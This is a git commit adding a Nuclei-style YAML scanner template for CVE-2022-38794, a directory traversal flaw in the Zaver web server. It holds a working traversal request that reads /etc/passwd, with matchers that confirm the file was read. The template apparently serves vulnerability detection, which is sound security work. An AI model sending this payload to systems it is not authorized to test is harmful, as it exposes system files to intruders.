Create CVE-2022-38794.yaml

patch-1
PikPikcU 2022-08-28 16:35:50 -04:00 committed by GitHub
parent 5b70cff01f
commit a4c3863f5a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions

View File

@ -0,0 +1,27 @@
id: CVE-2022-38794
info:
name: Zaver - Local File Inclusion
author: pikpikcu
severity: high
description: |
Zaver through 2020-12-15 allows directory traversal via the GET /.. substring.
reference:
- https://github.com/zyearn/zaver/issues/22
- https://nvd.nist.gov/vuln/detail/CVE-2022-38794
tags: cve,cve2022,lfi,zaver
requests:
- method: GET
path:
- '{{BaseURL}}/../../../../../../../../etc/passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200